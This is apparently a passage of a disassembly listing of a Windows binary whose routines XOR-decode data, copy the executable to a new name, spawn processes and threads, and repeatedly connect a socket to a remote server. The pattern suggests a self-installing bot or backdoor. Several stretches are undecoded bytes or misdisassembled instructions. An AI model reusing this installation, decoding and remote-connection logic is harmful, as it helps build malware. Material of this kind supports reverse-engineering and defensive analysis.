call sub_407E0E
push dword ptr [ebp-48h]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
loc_408218: ; CODE XREF: seg000:004081BA�j
mov al, ds:15FFFF33h
dec esp
rol byte ptr [ecx+0], 0BBh
add al, dl
pop es
add [ecx-17AC03BBh], cl
loopne near ptr loc_4081B5+1
; ---------------------------------------------------------------------------
db 2 dup(0), 59h
dd 68E44589h, 200h, 0FAF0858Dh, 5056FFFFh, 834BE8h, 0CC48300h
dd 5008458Dh, 0FAF0858Dh, 68FFFFh, 50000002h, 0FFE875FFh
dd 4306BC15h, 0CC753900h, 75FF1174h, 0F0858D08h, 50FFFFFAh
dd 3CFE8h, 8D595900h, 5056DC45h, 0FAF0858Dh, 75FFFFFFh
dd 75FF5008h, 7D72E8E0h, 3B8DFFFCh, 8B2273FBh, 3BC72BC3h
dd 3760845h, 5008458Bh, 0FAF0858Dh, 8B50FFFFh, 0C703E445h
dd 833EE850h, 0C4830000h, 87D030Ch, 74C47539h, 0C47D3B05h
dd 7D834A77h, 0C78B01BCh, 0E8C11274h, 858D500Ah, 0FFFFFDB8h
dd 2E846850h, 10EB0042h, 500AE8C1h, 0FDB8858Dh, 6850FFFFh
dd 422E40h, 69B8458Bh, 234C0h, 56D80500h, 0E8500043h, 820Bh
dd 3910C483h, 870F0875h, 0FFFFFF27h, 0C7C47539h, 1EC45h
dd 49740000h, 74C47D3Bh, 0C475FF44h, 0FAF0858Dh, 7589FFFFh
dd 0F86857ECh, 5000422Dh, 81D6E8h, 858D5600h, 0FFFFFAF0h
dd 50D475FFh, 0FD38858Dh, 0FF50FFFFh, 0FFFD34B5h, 6015E8FFh
dd 858D0000h, 0FFFFFAF0h, 0FAB0E850h, 0C483FFFFh, 4C15FF28h
dd 2B0041C0h, 0D233FC45h, 3E8B9h, 0E075FF00h, 0D233F1F7h
dd 0C78BC88Bh, 8BF1F741h, 7015FFD8h, 0FF0041C0h, 0F4E8E475h
dd 39000088h, 7459C875h, 0B8858D56h, 50FFFFFEh, 0FFFD3FE8h
dd 0C8453BFFh, 0FF447459h, 7589C875h, 858D50ECh, 0FFFFFAF0h
dd 422DBC68h, 4CE85000h, 56000081h, 0FAF0858Dh, 75FFFFFFh
dd 858D50D4h, 0FFFFFD38h, 34B5FF50h, 0E8FFFFFDh, 5F8Bh
dd 0FAF0858Dh, 0E850FFFFh, 0FFFFFA26h, 3928C483h, 840FEC75h
dd 237h, 1BC7D83h, 0E8840Fh, 5D890000h, 0FC7589F8h, 51F86DDFh
dd 0F87D8951h, 0DCFC7589h, 41C6400Dh, 0B8858D00h, 0DDFFFFFEh
dd 6DDF241Ch, 515150F8h, 0FAF0858Dh, 0DDCFFFFh, 41C640h
dd 68241CDDh, 422D70h, 80CDE850h, 0C4830000h, 0D075391Ch
dd 8D562075h, 0FFFAF085h, 0D475FFFFh, 38858D50h, 50FFFFFDh
dd 0FD34B5FFh, 4E8FFFFh, 8300005Fh, 858D14C4h, 0FFFFFAF0h
dd 0F99CE850h, 7D83FFFFh, 0F5901C0h, 1AE85h, 56056A00h
dd 0FEB8858Dh, 5056FFFFh, 422D6868h, 15FF5600h, 430714h
dd 0FD07539h, 18E85h, 0B8858D00h, 50FFFFFEh, 0FAF0858Dh
dd 3868FFFFh, 5000422Dh, 8056E8h, 858D5600h, 0FFFFFAF0h
dd 50D475FFh, 0FD38858Dh, 0FF50FFFFh, 0FFFD34B5h, 5E95E8FFh
dd 858D0000h, 0FFFFFAF0h, 0F930E850h, 0C483FFFFh, 145E924h
dd 5D890000h, 0FC7589F8h, 51F86DDFh, 0F87D8951h, 0DCFC7589h
dd 41C6400Dh, 0B8858D00h, 0DDFFFFFEh, 6DDF241Ch, 515150F8h
dd 0FAF0858Dh, 0DDCFFFFh, 41C640h, 68241CDDh, 422CE4h
dd 7FE5E850h, 0C4830000h, 0D075391Ch, 8D562075h, 0FFFAF085h
dd 0D475FFFFh, 38858D50h, 50FFFFFDh, 0FD34B5FFh, 1CE8FFFFh
dd 8300005Eh, 858D14C4h, 0FFFFFAF0h, 0F8B4E850h, 106AFFFFh
dd 56F0458Dh, 802AE850h, 446A0000h, 0FCF0858Dh, 575FFFFFh
dd 19E85056h, 83000080h, 0BD891CC4h, 0FFFFFCF0h, 0C7F0458Dh
dd 0FFFCFC85h, 42F3E8FFh, 66016A00h, 0FD20B589h, 505FFFFFh
dd 0FCF0858Dh, 5650FFFFh, 56286A56h, 0B8858D56h, 56FFFFFEh
dd 0BD895650h, 0FFFFFD1Ch, 0FC7A47E8h, 0C73B42FFh, 15FF1275h
dd 430700h, 0FFEB10E8h, 15FF56FFh, 41C0F8h, 0FEB8858Dh
dd 6850FFFFh, 422C98h
; ---------------------------------------------------------------------------
jmp short loc_4085EA
; ---------------------------------------------------------------------------
loc_4085DE: ; CODE XREF: seg000:00408197�j
lea eax, [ebp-248h]
push eax
push offset dword_422C58
loc_4085EA: ; CODE XREF: seg000:004085DC�j
lea eax, [ebp-510h]
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-30h], esi
jnz short loc_40861E
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_40E367
add esp, 14h
loc_40861E: ; CODE XREF: seg000:004085FC�j
lea eax, [ebp-510h]
push eax
call sub_407E0E
pop ecx
push dword ptr [ebp-18h]
call ds:dword_4307C4
push dword ptr [ebp-48h]
call sub_4102D3
pop ecx
push esi
call near ptr 3D0000h
retf
; ---------------------------------------------------------------------------
mov eax, [esp+4]
xor ecx, ecx
cmp [esp+8], ecx
jle short locret_408660
loc_408650: ; CODE XREF: seg000:0040865E�j
mov dl, ds:byte_42300C
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+8]
jl short loc_408650
locret_408660: ; CODE XREF: seg000:0040864E�j
retn
; =============== S U B R O U T I N E =======================================
sub_408661 proc near ; CODE XREF: seg000:0040B421�p
; seg000:0040B580�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41249F
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_408661 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40867B proc near ; CODE XREF: sub_404134+45D�p
; sub_404134+5F9�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_434B14
push 0
push edi
call sub_410590
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4086A0: ; CODE XREF: sub_40867B+5B�j
; sub_40867B+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_412100
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_412180
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_4086DE
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4086A0
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4086A0
; ---------------------------------------------------------------------------
loc_4086DE: ; CODE XREF: sub_40867B+4B�j
dec esi
mov eax, edi
loc_4086E1: ; CODE XREF: sub_40867B+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_4086F0
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_4086E1
; ---------------------------------------------------------------------------
loc_4086F0: ; CODE XREF: sub_40867B+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40867B endp
; =============== S U B R O U T I N E =======================================
sub_4086FA proc near ; CODE XREF: sub_4088A6+51�p
; sub_4088A6+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4307F0
sub eax, 0
jz short loc_40873D
dec eax
jz short loc_408737
dec eax
dec eax
jz short loc_408731
dec eax
jz short loc_40872B
dec eax
jz short loc_408725
dec eax
jz short loc_40871F
mov eax, offset word_422AD8
retn
; ---------------------------------------------------------------------------
loc_40871F: ; CODE XREF: sub_4086FA+1D�j
mov eax, offset dword_422F34
retn
; ---------------------------------------------------------------------------
loc_408725: ; CODE XREF: sub_4086FA+1A�j
mov eax, offset dword_422F2C
retn
; ---------------------------------------------------------------------------
loc_40872B: ; CODE XREF: sub_4086FA+17�j
mov eax, offset dword_422F24
retn
; ---------------------------------------------------------------------------
loc_408731: ; CODE XREF: sub_4086FA+14�j
mov eax, offset dword_422F1C
retn
; ---------------------------------------------------------------------------
loc_408737: ; CODE XREF: sub_4086FA+10�j
mov eax, offset dword_422F14
retn
; ---------------------------------------------------------------------------
loc_40873D: ; CODE XREF: sub_4086FA+D�j
mov eax, offset dword_422F0C
retn
sub_4086FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408743 proc near ; CODE XREF: sub_40878B+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_4306A0
test eax, eax
jz short loc_408778
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax
loc_408778: ; CODE XREF: sub_408743+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_408743 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40878B proc near ; CODE XREF: sub_40799C+1F3�p
; sub_4088A6+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_408743
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_408863
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_408863
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_408863
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_4124F0
push edx
push eax
call sub_40867B
mov edi, offset dword_422F40
push eax
mov esi, 80h
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_410A8A
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_4124F0
push edx
push eax
call sub_40867B
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_410A8A
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4124F0
push edx
push eax
call sub_40867B
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_410A8A
add esp, 18h
pop ebx
jmp short loc_408892
; ---------------------------------------------------------------------------
loc_408863: ; CODE XREF: sub_40878B+2C�j
; sub_40878B+3B�j ...
mov esi, offset dword_422F38
lea eax, [ebp+var_198]
push esi
push eax
call sub_41050B
lea eax, [ebp+var_118]
push esi
push eax
call sub_41050B
lea eax, [ebp+var_98]
push esi
push eax
call sub_41050B
add esp, 18h
loc_408892: ; CODE XREF: sub_40878B+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40878B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088A6 proc near ; CODE XREF: sub_408978+17�p
; sub_408978+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40878B
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset dword_422F38
rep movsd
push eax
call sub_410930
add esp, 10h
test eax, eax
jnz short loc_408919
push ebx
push ebx
call sub_4086FA
pop ecx
push eax
push offset dword_422F98
lea eax, [ebp+var_500]
push 200h
push eax
call sub_410A8A
add esp, 14h
jmp short loc_40894D
; ---------------------------------------------------------------------------
loc_408919: ; CODE XREF: sub_4088A6+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4086FA
pop ecx
push eax
push offset dword_422F48
lea eax, [ebp+var_500]
push 200h
push eax
call sub_410A8A
add esp, 20h
loc_40894D: ; CODE XREF: sub_4088A6+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
lea eax, [ebp+var_500]
push eax
call sub_407E0E
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4088A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408978 proc near ; CODE XREF: seg000:0040DA6D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_408999
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4088A6
add esp, 10h
jmp short loc_4089FA
; ---------------------------------------------------------------------------
loc_408999: ; CODE XREF: sub_408978+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_430710
lea esi, [eax+2]
push esi
call sub_410C0F
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_430710
cmp [edi], bl
mov esi, edi
jz short loc_4089F1
loc_4089BD: ; CODE XREF: sub_408978+77�j
push offset dword_422FE8
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_4089E0
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4088A6
add esp, 10h
loc_4089E0: ; CODE XREF: sub_408978+54�j
push esi
call sub_410B60
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_4089BD
loc_4089F1: ; CODE XREF: sub_408978+43�j
push edi
call sub_410C83
pop ecx
pop edi
pop esi
loc_4089FA: ; CODE XREF: sub_408978+1F�j
pop ebx
pop ebp
retn
sub_408978 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089FD proc near ; DATA XREF: sub_4089FD+FC�o
var_1577B = byte ptr -1577Bh
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_4F4 = byte ptr -4F4h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_1E8 = byte ptr -1E8h
var_158 = byte ptr -158h
var_E4 = byte ptr -0E4h
var_A0 = byte ptr -0A0h
var_64 = dword ptr -64h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_4358E4
call ds:dword_430828
call sub_410180
call ds:dword_430700
call ds:dword_430700
mov ebx, ds:dword_41C058
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_410590
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_410590
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset dword_42F3E8
mov [ebp+var_28], 1
mov [ebp+var_24], di
call near ptr 3D0000h
add cl, [ebp+var_1577B]
call dword ptr [esi+50h]
push edi
call near ptr 3D0000h
mov ah, 8Dh
inc ebp
lock push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call near ptr 3D0000h
push esi
test eax, eax
jz short loc_408AC2
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_41C070
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_408AC2: ; CODE XREF: sub_4089FD+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_434B4C
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_41C0F8 ; ExitProcess
pop edi
pop esi
pop ebx
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_4089FD
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
cmp ds:dword_423000, ebx
jz short loc_408B1E
call sub_407261
loc_408B1E: ; CODE XREF: sub_4089FD+11A�j
mov esi, ds:dword_41C04C
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_45EBC8, eax
call esi ; GetTickCount
push eax
call sub_41055D
pop ecx
call sub_405D8E
push 2
call ds:dword_43083C
push 7530h
push offset dword_423018
push ebx
push ebx
call near ptr 1090004h
cmpsd
push eax
call near ptr 1250004h
pusha
cmp eax, 102h
jnz short loc_408B72
push 1
call ds:dword_41C0F8 ; ExitProcess
loc_408B72: ; CODE XREF: sub_4089FD+16B�j
lea eax, [ebp+var_884]
push eax
push 202h
call ds:dword_430718
cmp eax, ebx
jnz loc_4090A7
cmp [ebp+var_884], 2
jnz loc_4090A1
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4090A1
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call near ptr 1270004h
dec ecx
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call near ptr 1290004h
mov esp, 7433E850h
jmp far ptr 0FA0Ch:858D3100h
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0C858D50h, 50FFFFF9h, 14858D53h, 53FFFFFDh, 95FAE850h
dd 858D0000h, 0FFFFFA0Ch, 0C858D50h, 50FFFFF9h, 41F96868h
dd 0C858D00h, 56FFFFFBh, 7E7CE850h, 858D0000h, 0FFFFFC10h
dd 14858D50h, 50FFFFFDh, 7EBFE8h, 30C48300h, 850FC085h
dd 1B8h, 0ED381D39h, 68BE0045h, 74004230h, 0FF335631h
dd 7F1FE8h, 4E88300h
db 59h, 74h, 23h
; ---------------------------------------------------------------------------
loc_408C47: ; CODE XREF: sub_4089FD+26B�j
call sub_410567
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov ds:byte_423068[edi], dl
inc edi
call sub_410B60
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_408C47
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset dword_42A12C
push eax
call sub_41050B
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call ds:dword_41C07C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_408CAA
lea eax, [ebp+var_1E8]
push 80h
push eax
; ---------------------------------------------------------------------------
dd 0FC7357E8h
db 0FFh, 58h
; ---------------------------------------------------------------------------
loc_408CAA: ; CODE XREF: sub_4089FD+299�j
mov esi, ds:dword_41C108
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_408CC1: ; CODE XREF: sub_4089FD+2FB�j
call esi ; CopyFileA
test eax, eax
jnz short loc_408CFA
call ds:dword_41C068 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_408CFA
cmp eax, 20h
jz short loc_408CDB
cmp eax, 5
jnz short loc_408CFA
loc_408CDB: ; CODE XREF: sub_4089FD+2D7�j
push 1
pop edi
push 3A98h
call ds:dword_41C058 ; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_408CC1
; ---------------------------------------------------------------------------
loc_408CFA: ; CODE XREF: sub_4089FD+2C8�j
; sub_4089FD+2D2�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_407013
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call near ptr 1310004h
jmp short loc_408D81
; ---------------------------------------------------------------------------
db 10h
dd 53E0458Dh, 786EE850h, 446A0000h, 0FF1C858Dh, 565EFFFFh
dd 5DE85053h, 83000078h, 0B58918C4h, 0FFFFFF1Ch, 0FF2885C7h
dd 0F3E8FFFFh, 89660042h, 0FFFF4C9Dh, 5E016AFFh, 0FF48B589h
dd 0A9E8FFFFh, 0AC00F272h, 685650h, 0E8001000h, 0F4729Ch
dd 148D8D9Ah, 51FFFFFDh, 18858D50h, 50FFFFFEh, 0F678858Dh
dd 2068FFFFh
db 0A1h
; ---------------------------------------------------------------------------
loc_408D81: ; CODE XREF: sub_4089FD+318�j
inc edx
add [eax-18h], dl
xor byte ptr [edi+0], 0
add esp, 14h
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call near ptr 1370004h
dec edx
test eax, eax
jz short loc_408DE4
push 0C8h
call ds:dword_41C058 ; Sleep
push [ebp+var_20]
mov esi, ds:dword_41C070
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call ds:dword_430700
push ebx
call ds:dword_41C0F8 ; ExitProcess
loc_408DE4: ; CODE XREF: sub_4089FD+3BD�j
cmp ds:dword_45F860, 2
jle short near ptr loc_408E2F+1
mov eax, ds:dword_45F864
push dword ptr [eax+4]
call sub_410A7F
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call near ptr 3D0000h
das
push esi
call ds:dword_41C070 ; CloseHandle
mov eax, ds:dword_45F864
cmp [eax+8], ebx
jz short near ptr loc_408E2F+1
push 7D0h
call ds:dword_41C058 ; Sleep
mov eax, ds:dword_45F864
push dword ptr [eax+8]
call near ptr 3D0000h
loc_408E2F: ; CODE XREF: sub_4089FD+3EE�j
; sub_4089FD+418�j
les edi, [ecx]
sbb eax, offset dword_423008
jz short loc_408E4D
cmp ds:dword_430860, ebx
jnz short loc_408E4D
lea eax, [ebp+var_4F4]
push eax
call sub_40801D
pop ecx
loc_408E4D: ; CODE XREF: sub_4089FD+439�j
; sub_4089FD+441�j
lea eax, [ebp+var_A0]
push offset dword_42A0F4
push eax
call sub_41050B
push ebx
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_40FFB7
lea eax, [ebp+var_A0]
push eax
call sub_407E0E
push 0B80h
push ebx
push offset dword_434B58
call sub_410590
lea eax, [ebp+var_A0]
push offset dword_42A0B4
push eax
call sub_41050B
push ebx
lea eax, [ebp+var_A0]
push 1
push eax
call sub_40FFB7
add esp, 38h
mov esi, eax
mov edi, ds:dword_41C06C
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset loc_40FF99
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_4358EC[esi], eax
jnz short loc_408EED
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset dword_42A064
push eax
call sub_41050B
add esp, 0Ch
loc_408EED: ; CODE XREF: sub_4089FD+4D3�j
lea eax, [ebp+var_A0]
push eax
call sub_407E0E
lea eax, [ebp+var_A0]
mov dword ptr [esp+0], offset dword_42A028
push eax
call sub_41050B
push ebx
lea eax, [ebp+var_A0]
push 1
push eax
call sub_40FFB7
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset loc_40808D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_4358EC[esi], eax
jnz short loc_408F60
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset dword_429FD8
push eax
call sub_41050B
add esp, 0Ch
loc_408F60: ; CODE XREF: sub_4089FD+546�j
lea eax, [ebp+var_A0]
push eax
call sub_407E0E
call sub_410567
push 7Fh
push offset dword_423038
push offset dword_45EBD4
mov ds:dword_45ED4C, ebx
call sub_411D00
mov eax, ds:dword_422FEC
push 3Fh
mov edi, offset dword_45EC54
push offset dword_423044
push edi
mov ds:dword_45ED24, eax
call sub_411D00
push 3Fh
mov esi, offset dword_45EC94
push offset dword_423048
push esi
call sub_411D00
add esp, 28h
mov ds:dword_45ED28, ebx
loc_408FBF: ; CODE XREF: sub_4089FD+64A�j
; sub_4089FD+655�j ...
mov [ebp+var_4], ebx
loc_408FC2: ; CODE XREF: sub_4089FD+5FE�j
push offset dword_45EBD0
mov ds:dword_45ED48, ebx
call sub_4090B0
cmp eax, 2
mov [ebp+var_10], eax
jz loc_40909C
cmp ds:dword_45ED48, ebx
jz short loc_408FE9
dec [ebp+var_4]
loc_408FE9: ; CODE XREF: sub_4089FD+5E7�j
push 0BB8h
call ds:dword_41C058 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_408FC2
cmp [ebp+var_10], 2
jz loc_40909C
cmp [ebp+var_C], ebx
jz short loc_40904C
push 7Fh
push offset dword_423038
push offset dword_45EBD4
call sub_411D00
mov eax, ds:dword_422FEC
push 3Fh
push offset dword_423044
push edi
mov ds:dword_45ED24, eax
call sub_411D00
push 3Fh
push offset dword_423048
push esi
call sub_411D00
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_408FBF
; ---------------------------------------------------------------------------
loc_40904C: ; CODE XREF: sub_4089FD+60D�j
cmp ds:byte_423050, bl
jz loc_408FBF
push 7Fh
push offset byte_423050
push offset dword_45EBD4
call sub_411D00
mov eax, ds:dword_422FF0
push 3Fh
push offset dword_42305C
push edi
mov ds:dword_45ED24, eax
call sub_411D00
push 3Fh
push offset dword_423060
push esi
call sub_411D00
add esp, 24h
mov [ebp+var_C], 1
jmp loc_408FBF
; ---------------------------------------------------------------------------
loc_40909C: ; CODE XREF: sub_4089FD+5DB�j
; sub_4089FD+604�j
call sub_410180
loc_4090A1: ; CODE XREF: sub_4089FD+196�j
; sub_4089FD+1A6�j
call ds:dword_430700
loc_4090A7: ; CODE XREF: sub_4089FD+189�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_4089FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4090B0 proc near ; CODE XREF: sub_4089FD+5D0�p
; DATA XREF: seg000:0040C4CB�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_4090D5: ; CODE XREF: sub_4090B0+E6�j
; sub_4090B0+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_410590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_430794
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40731F
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_409202
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_410590
push 0
lea eax, [ebp+var_2C]
push ds:dword_45ED3C
push ds:dword_423014
push eax
call sub_40FA4E
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_4358F0
push edi
push eax
call sub_411D00
add esp, 28h
push 6
push 1
push 2
call ds:dword_430810
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov ds:dword_4358E4[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_430740
cmp eax, 0FFFFFFFFh
jnz short loc_40919B
push esi
call ds:dword_430828
call sub_407348
push 7D0h
loc_409190: ; CODE XREF: sub_4090B0+146�j
call ds:dword_41C058 ; Sleep
jmp loc_4090D5
